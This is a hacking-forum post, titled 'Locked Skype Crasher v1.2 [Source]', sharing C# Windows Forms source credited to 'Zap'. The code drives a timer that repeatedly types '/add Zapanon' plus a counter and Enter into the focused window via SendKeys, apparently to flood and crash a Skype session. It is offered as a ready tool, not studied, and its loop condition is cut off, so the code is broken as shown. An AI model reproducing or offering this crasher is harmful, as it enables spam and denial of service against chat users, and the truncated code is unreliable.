Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy

Locked Skype Crasher v1.2 [Source]


dEEpEst

Recommended Posts

[HIDE-THANKS][LENGUAJE=c]Coded by Zap

##########################

using System;

using System.Collections.Generic;

using System.ComponentModel;

using System.Data;

using System.Drawing;

using System.Linq;

using System.Text;

using System.Windows.Forms;

namespace WindowsFormsApplication1

{

public partial class Form1 : Form

{

int count = 1;

public Form1()

{

InitializeComponent();

label1.BackColor = Color.Transparent;

label2.BackColor = Color.Transparent;

 

}

private void button1_Click(object sender, EventArgs e)

{

timer1.Enabled = true;

 

}

private void button2_Click(object sender, EventArgs e)

{

timer1.Enabled = false;

}

 

private void timer1_Tick(object sender, EventArgs e)

{ int i;

i=0;

for (i = 0; i

{

string value = "/add Zapanon";

//var result = string.Format("/add Zapanon{0} {Enter}", newstringg);

value += count;

value += " {Enter}";

SendKeys.Send(value);

count = count + 1;

}

}

private void label1_Click(object sender, EventArgs e)

{

}

}

}[/LENGUAJE]

 

 

This is the hidden content, please

[/HIDE-THANKS]

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.